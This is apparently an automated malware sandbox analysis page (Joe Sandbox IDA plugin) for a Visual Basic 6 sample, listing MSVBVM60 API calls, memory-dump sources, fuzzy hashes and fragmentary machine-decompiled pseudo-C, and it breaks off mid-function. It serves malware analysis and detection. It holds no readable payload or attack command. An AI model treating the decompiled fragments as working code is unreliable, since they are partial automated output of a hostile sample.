                                                                                • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041E65B
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041E667
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E691
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041E6B4
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041E6C1
                                                                                • __vbaVarMove.MSVBVM60 ref: 0041E6D4
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041E6DD
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041E707
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 0041E71C
                                                                                • __vbaErase.MSVBVM60(00000000,?,?,00000000,00000000,72A1A274), ref: 0041E72C
                                                                                • __vbaFreeObj.MSVBVM60(0041E760), ref: 0041E759
                                                                                • __vbaErrorOverflow.MSVBVM60(?,00000000,00000000,72A1A274), ref: 0041E776
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$Error$AddrefBoundsGenerateNew2Text$EraseMoveOverflowRedim
                                                                                • String ID:
                                                                                • API String ID: 504347678-0
                                                                                • Opcode ID: 25a1c3befd997c7e03a07d7e53f24812b5889649f90fca6093263f934ed64c0d
                                                                                • Instruction ID: 8d8a322bf0015829083212b0257836bc7f1c301babde4db3d53e1b8fcbf7065c
                                                                                • Opcode Fuzzy Hash: 25a1c3befd997c7e03a07d7e53f24812b5889649f90fca6093263f934ed64c0d
                                                                                • Instruction Fuzzy Hash: D0519674A00219AFDB14DF95CD89EEEBBB9FF58705F004119FA01A72A0D774A885CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041EF00, Relevance: 18.1, APIs: 12, Instructions: 138COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041EDC0: __vbaNew2.MSVBVM60(0040B83C,?,00000000,?,?), ref: 0041EE0C
                                                                                  • Part of subcall function 0041EDC0: __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?), ref: 0041EE19
                                                                                  • Part of subcall function 0041EDC0: __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EE44
                                                                                  • Part of subcall function 0041EDC0: __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041EE51
                                                                                  • Part of subcall function 0041EDC0: __vbaFreeVar.MSVBVM60 ref: 0041EE5C
                                                                                  • Part of subcall function 0041EDC0: __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041EE91
                                                                                  • Part of subcall function 0041EDC0: __vbaObjSet.MSVBVM60(?,?), ref: 0041EE9E
                                                                                  • Part of subcall function 0041EDC0: __vbaFreeObj.MSVBVM60(0041EED7), ref: 0041EED0
                                                                                • __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001,00000000,?,00000000,00000000,72A1A274), ref: 0041EF69
                                                                                • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041EF7E
                                                                                • __vbaObjSetAddref.MSVBVM60(?), ref: 0041EF8B
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EFB6
                                                                                • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041EFCB
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041EFD7
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041F001
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041F024
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041F031
                                                                                • __vbaVarMove.MSVBVM60 ref: 0041F044
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041F04D
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041F077
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 0041F08C
                                                                                • __vbaErase.MSVBVM60(00000000,?,?,00000000,00000000,72A1A274), ref: 0041F09C
                                                                                • __vbaFreeObj.MSVBVM60(0041F0D0), ref: 0041F0C9
                                                                                • __vbaErrorOverflow.MSVBVM60(?,00000000,00000000,72A1A274), ref: 0041F0E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$Error$AddrefBoundsGenerateNew2Text$EraseMoveOverflowRedim
                                                                                • String ID:
                                                                                • API String ID: 504347678-0
                                                                                • Opcode ID: c0e263ebe6c96ca4a770220e6563f5187304d2d2e5baecf2686758a9dcf6c76c
                                                                                • Instruction ID: e24812112e04b45a5ba54ce6e2ee454485eb8960c8ac5a87c6d8bf6bc291ae3f
                                                                                • Opcode Fuzzy Hash: c0e263ebe6c96ca4a770220e6563f5187304d2d2e5baecf2686758a9dcf6c76c
                                                                                • Instruction Fuzzy Hash: C4517274A00219AFDB14DF95CD48EEEBBB8FF48704F008119F951E72A1D778A846CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041F1A0, Relevance: 16.6, APIs: 11, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041F1FB
                                                                                • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041F20C
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041F217
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0041124C,00000028), ref: 0041F23D
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 0041F254
                                                                                • __vbaFreeObj.MSVBVM60(?,?), ref: 0041F266
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041F26F
                                                                                • __vbaCastObj.MSVBVM60(00000000,0041124C), ref: 0041F27B
                                                                                • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041F283
                                                                                • __vbaCastObj.MSVBVM60(00000000,0041124C), ref: 0041F292
                                                                                • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041F29A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$CastCheckHresult$Text
                                                                                • String ID:
                                                                                • API String ID: 487687974-0
                                                                                • Opcode ID: a4fe69aefbc4864d75cfec748256471c64bd308027906ef8e81739ba6c92d51e
                                                                                • Instruction ID: f954da8628ce93caaaefef3ca969f1f44cfc29d794eb5d758d5a8779969d0332
                                                                                • Opcode Fuzzy Hash: a4fe69aefbc4864d75cfec748256471c64bd308027906ef8e81739ba6c92d51e
                                                                                • Instruction Fuzzy Hash: 65312D75D00208ABCB049F95DD89DEEBBB8EF58700B10815AF511F71A1D7786946CF68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E210, Relevance: 16.6, APIs: 11, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E26B
                                                                                • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041E27C
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041E287
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411158,00000024), ref: 0041E2AD
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 0041E2C4
                                                                                • __vbaFreeObj.MSVBVM60(?,?), ref: 0041E2D6
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041E2DF
                                                                                • __vbaCastObj.MSVBVM60(00000000,00411158), ref: 0041E2EB
                                                                                • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041E2F3
                                                                                • __vbaCastObj.MSVBVM60(00000000,00411158), ref: 0041E302
                                                                                • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041E30A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$CastCheckHresult$Text
                                                                                • String ID:
                                                                                • API String ID: 487687974-0
                                                                                • Opcode ID: 2c01fdd9468ded3a79b0bbbf3a1152e3a084904c1e8a70a199185aff6e3e5529
                                                                                • Instruction ID: 4201e1f4fb133b764ed51ee68f79bda269d9589fa57d42cf3489bc47036d5ddb
                                                                                • Opcode Fuzzy Hash: 2c01fdd9468ded3a79b0bbbf3a1152e3a084904c1e8a70a199185aff6e3e5529
                                                                                • Instruction Fuzzy Hash: 57314B75D40208ABCB04DFA6DD899EEBBBCEF58700B10801AFA12B7260D7785945CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00424480, Relevance: 16.6, APIs: 11, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60(?,00000000,72A1A274), ref: 004244C0
                                                                                • #537.MSVBVM60(00000022), ref: 004244CE
                                                                                • __vbaStrMove.MSVBVM60 ref: 004244DB
                                                                                • __vbaStrCat.MSVBVM60(?,00000000), ref: 004244E8
                                                                                • __vbaStrMove.MSVBVM60 ref: 004244EF
                                                                                • #537.MSVBVM60(00000022,00000000), ref: 004244F4
                                                                                • __vbaStrMove.MSVBVM60 ref: 004244FB
                                                                                • __vbaStrCat.MSVBVM60(00000000), ref: 004244FE
                                                                                • __vbaStrMove.MSVBVM60 ref: 00424505
                                                                                • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00424515
                                                                                • __vbaFreeStr.MSVBVM60(00424556), ref: 0042454F
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Move$#537Free$CopyList
                                                                                • String ID:
                                                                                • API String ID: 1274409727-0
                                                                                • Opcode ID: 5f7312e8f01affa2c88811be5faa8aa1fa9f33ac8247d51851b76aa7fbad4ad8
                                                                                • Instruction ID: f493d40b7015ae32eb3e41f5dc42a2e48cf5a5ac9014bc306b0c70572c1fd617
                                                                                • Opcode Fuzzy Hash: 5f7312e8f01affa2c88811be5faa8aa1fa9f33ac8247d51851b76aa7fbad4ad8
                                                                                • Instruction Fuzzy Hash: D2112E71D00208AFCB00EFA4DD45AEEBBB8EF5C700F10402AE505F7260EA746905CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00418640, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041868C
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041869F
                                                                                • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004186A8
                                                                                • __vbaSetSystemError.MSVBVM60(00080009,0000000C,00000000,00000000), ref: 004186BE
                                                                                • __vbaStrToUnicode.MSVBVM60(004015A0,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004186C9
                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004186D8
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401538,0040F430,00000390), ref: 00418719
                                                                                • __vbaFreeStr.MSVBVM60(0041873A,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00418733
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CopyFree$AnsiCheckErrorHresultSystemUnicode
                                                                                • String ID: Text
                                                                                • API String ID: 706850715-2612594937
                                                                                • Opcode ID: dce327fcc03a66a133f3cfaa2aa545bcfa7c086e13176e0a16847a1dd296753c
                                                                                • Instruction ID: 11358420491c432dafd8a14dd56769f386c4476c9d9c733996ee30f45fde3063
                                                                                • Opcode Fuzzy Hash: dce327fcc03a66a133f3cfaa2aa545bcfa7c086e13176e0a16847a1dd296753c
                                                                                • Instruction Fuzzy Hash: 1D313E74900205AFCB04DF69C949AAEFBB8FF58700F10852EE555A7690DB78A445CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00416890, Relevance: 15.1, APIs: 10, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 20%
                                                                                			E00416890(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v28;
				intOrPtr _v32;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;
				intOrPtr _t43;
				intOrPtr* _t49;
				intOrPtr _t51;
				intOrPtr* _t58;
				intOrPtr* _t59;
				intOrPtr* _t60;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr _t86;

				_t86 = _t85 - 8;
				_push(0x401d26);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t86;
				_v12 = _t86 - 0x18;
				_v8 = 0x401360;
				_t82 = _a4;
				_v24 = 0;
				_v28 = 0;
				if( *((intOrPtr*)(_t82 + 0x70)) == 0) {
					_t79 = __imp____vbaSetSystemError;
				} else {
					_t49 =  *((intOrPtr*)( *_t82 + 0x3b0))(_t82);
					__imp____vbaObjSet( &_v24, _t49);
					_t80 = _t49;
					_t51 =  *((intOrPtr*)( *_t80 + 0x1c0))(_t80,  &_v28);
					asm("fclex");
					if(_t51 < 0) {
						__imp____vbaHresultCheckObj(_t51, _t80, 0x410414, 0x1c0);
					}
					_t60 = _t82 + 0x84;
					E0041006C();
					_t79 = __imp____vbaSetSystemError;
					_v32 = _t51;
					 *_t79(_v28, _t60);
					 *((intOrPtr*)(_t82 + 0x80)) = _v32;
					__imp____vbaFreeObj();
					E0040F790();
					 *_t79( *((intOrPtr*)(_t82 + 0x70)), 0,  *_t60,  *((intOrPtr*)(_t82 + 0x88)),  *((intOrPtr*)(_t82 + 0x8c)),  *((intOrPtr*)(_t82 + 0x90)), 0x14);
				}
				if( *((intOrPtr*)(_t82 + 0x74)) != 0) {
					_t41 =  &_v24;
					__imp____vbaObjSet(_t41,  *((intOrPtr*)( *_t82 + 0x3ac))(_t82));
					_t58 = _t41;
					_t42 =  *((intOrPtr*)( *_t58 + 0x1c0))(_t58,  &_v28);
					asm("fclex");
					if(_t42 < 0) {
						__imp____vbaHresultCheckObj(_t42, _t58, 0x410414, 0x1c0);
					}
					_t43 = _v28;
					_t59 = _t82 + 0x94;
					E0041006C();
					_v32 = _t43;
					 *_t79(_t43, _t59);
					 *((intOrPtr*)(_t82 + 0x80)) = _v32;
					__imp____vbaFreeObj();
					E0040F790();
					 *_t79( *((intOrPtr*)(_t82 + 0x74)), 0,  *_t59,  *((intOrPtr*)(_t82 + 0x98)),  *((intOrPtr*)(_t82 + 0x9c)),  *((intOrPtr*)(_t82 + 0xa0)), 0x14);
				}
				_t39 =  *((intOrPtr*)( *_t82 + 0x8b4))(_t82);
				_push(0x416a13);
				return _t39;
			}






















                                                                                0x00416893
                                                                                0x00416896
                                                                                0x004168a1
                                                                                0x004168a2
                                                                                0x004168af
                                                                                0x004168b2
                                                                                0x004168b9
                                                                                0x004168be
                                                                                0x004168c1
                                                                                0x004168c7
                                                                                0x0041695e
                                                                                0x004168cd
                                                                                0x004168d0
                                                                                0x004168db
                                                                                0x004168e1
                                                                                0x004168ea
                                                                                0x004168f2
                                                                                0x004168f4
                                                                                0x00416902
                                                                                0x00416902
                                                                                0x0041690b
                                                                                0x00416913
                                                                                0x00416918
                                                                                0x0041691e
                                                                                0x00416921
                                                                                0x00416929
                                                                                0x0041692f
                                                                                0x00416955
                                                                                0x0041695a
                                                                                0x0041695a
                                                                                0x00416969
                                                                                0x00416979
                                                                                0x0041697d
                                                                                0x00416983
                                                                                0x0041698c
                                                                                0x00416994
                                                                                0x00416996
                                                                                0x004169a4
                                                                                0x004169a4
                                                                                0x004169aa
                                                                                0x004169ad
                                                                                0x004169b5
                                                                                0x004169ba
                                                                                0x004169bd
                                                                                0x004169c2
                                                                                0x004169cb
                                                                                0x004169f1
                                                                                0x004169f6
                                                                                0x004169f6
                                                                                0x004169fb
                                                                                0x00416a01
                                                                                0x00000000

                                                                                APIs
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00401D26), ref: 004168DB
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0,?,?,?,?,?,?,?,?,00401D26), ref: 00416902
                                                                                • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00416921
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00401D26), ref: 0041692F
                                                                                • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,00000014,?,?,?,?,?,?,?,?,00401D26), ref: 0041695A
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00401D26), ref: 0041697D
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,000001C0,?,?,?,?,?,?,?,?,00401D26), ref: 004169A4
                                                                                • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004169BD
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00401D26), ref: 004169CB
                                                                                • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,00000014,?,?,?,?,?,?,?,?,00401D26), ref: 004169F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$ErrorSystem$CheckFreeHresult
                                                                                • String ID:
                                                                                • API String ID: 3470325077-0
                                                                                • Opcode ID: 3e37ed51ec3eab2260e1e8d93aa247695829d60059629668c722d6bf01ebe3c5
                                                                                • Instruction ID: 436ae83611ac3ab763441565944a166f388d92644671e6a115ce87b9a393c64e
                                                                                • Opcode Fuzzy Hash: 3e37ed51ec3eab2260e1e8d93aa247695829d60059629668c722d6bf01ebe3c5
                                                                                • Instruction Fuzzy Hash: F5415DB0900609AFD710DFA4C985FEBB7F8FF48700F108529F686E7251DB74A8458BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004221F0, Relevance: 15.1, APIs: 10, Instructions: 114COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaSetSystemError.MSVBVM60(?,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00422252
                                                                                • __vbaSetSystemError.MSVBVM60(?,?,00000008,?,00000008), ref: 0042226F
                                                                                • #685.MSVBVM60(?,00000008,?,00000008), ref: 00422277
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,00000008,?,00000008), ref: 0042227E
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004119EC,0000004C,?,00000008,?,00000008), ref: 0042229F
                                                                                • __vbaFreeObj.MSVBVM60(?,00000008,?,00000008), ref: 004222B6
                                                                                • #685.MSVBVM60(?,00000008,?,00000008), ref: 004222CD
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,00000008,?,00000008), ref: 004222D4
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004119EC,0000004C,?,00000008,?,00000008), ref: 004222F5
                                                                                • __vbaFreeObj.MSVBVM60(?,00000008,?,00000008), ref: 0042230C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$#685CheckErrorFreeHresultSystem
                                                                                • String ID:
                                                                                • API String ID: 3872544020-0
                                                                                • Opcode ID: af78cd6ba52e7d9bc5289ce7886ded48ffdc8ff9f1db35df46dd3f1528e76402
                                                                                • Instruction ID: c71af55f8ef969f0d82e6d7f33767a1e66a9333ad20b365ad60b9d01497f40b0
                                                                                • Opcode Fuzzy Hash: af78cd6ba52e7d9bc5289ce7886ded48ffdc8ff9f1db35df46dd3f1528e76402
                                                                                • Instruction Fuzzy Hash: FE416F75A01215ABDB10DFA5CA859DFBBB8FF4C740B50452AE941F7250D7789C40CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041D400, Relevance: 15.1, APIs: 10, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(0040B730,?,00000000,00401690), ref: 0041D443
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,0000001C), ref: 0041D467
                                                                                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D470
                                                                                • __vbaNew2.MSVBVM60(0040B730,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D484
                                                                                • __vbaNew2.MSVBVM60(0040B730,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D497
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000020), ref: 0041D4B3
                                                                                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D4BC
                                                                                • __vbaNew2.MSVBVM60(0040B730,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D4D2
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D4D9
                                                                                • __vbaFreeObj.MSVBVM60(0041D509,?,?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041D502
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$New2$Free$CheckHresult$Addref
                                                                                • String ID:
                                                                                • API String ID: 2032624950-0
                                                                                • Opcode ID: 15a05a22236c11a641ae1816682f5b1709ae9fb9ece815951c33b63d200af556
                                                                                • Instruction ID: d158ac7346c3867bacecfea32575f4cecfbfdf00a72e3fb2d8eb31f6f13ebce5
                                                                                • Opcode Fuzzy Hash: 15a05a22236c11a641ae1816682f5b1709ae9fb9ece815951c33b63d200af556
                                                                                • Instruction Fuzzy Hash: 64312470940249BBDB10DF95CD85EEFBBB8EF98700F104025F645A31A0D778A485CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00620010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284138323.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_620000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                                                • API String ID: 0-211638553
                                                                                • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction ID: c107cec089338e7e789a4f347099fa7cc688ed0643c67d2ccd62c7d05e28e3cf
                                                                                • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction Fuzzy Hash: 62312B38E411289BCB04DB98DD84AED7BB6FF4C340B508027D502737A5DB789986CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00415C70, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 16%
                                                                                			E00415C70(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
